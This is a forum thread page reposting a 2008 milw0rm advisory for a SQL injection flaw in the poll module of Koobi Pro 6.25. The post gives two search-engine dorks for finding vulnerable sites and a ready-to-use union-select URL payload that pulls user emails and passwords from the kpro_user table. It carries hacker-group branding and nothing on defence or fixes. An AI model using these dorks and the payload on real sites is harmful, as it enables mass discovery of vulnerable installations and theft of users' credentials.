Explore Your Brain







Username Password

Lost Password
View Thread
Explore Your Brain » All About Security I.T » Info Security
Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

22-02-2009 07:25 AM
#1
Who is here? 1 guest(s)
Koobi Pro 6.25 poll Remote SQL Inject...
User Avatar

squatter7
Murid Akademi I


Posts: 10
Joined: 22.02.09 		##########################################
#
# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=poll"showresult
#
# DORK 2 : allinurl: poll_id "showresult"
#
###########################################
EXPLOiT :

index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user

*********************************************
WEBSiTE: http://www.xcorpitx-hack.com/Forum
*********************************************
********************S@BUN********************
*********************************************

# milw0rm.com [2008-04-14]
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
SQL injection [Attack + Defense] Black & White Proof of Concept 8 10-05-2011 22:06
HTML Injection In Social Networking Site (POC For Dummies) Black & White Proof of Concept 14 17-03-2011 20:31
Remote PC Networking 14 02-01-2011 19:47
HAVECMS 2.0 Beta <======= SQL Injection Info Security 10 26-09-2010 21:52
WebSuite Content Management System (SQL Injection) Info Security 3 13-09-2010 19:06
Copyright © 2007-2016

Sunset theme originally by Digitanium. Converted to PHP-Fusion v7 by Kenneth.
Re-Design by EVA-00
Powered by PHP-Fusion copyright © 2002 - 2025 by Nick Jones.
Released as free software without warranties under GNU Affero GPL v3.

16,674,777 unique visits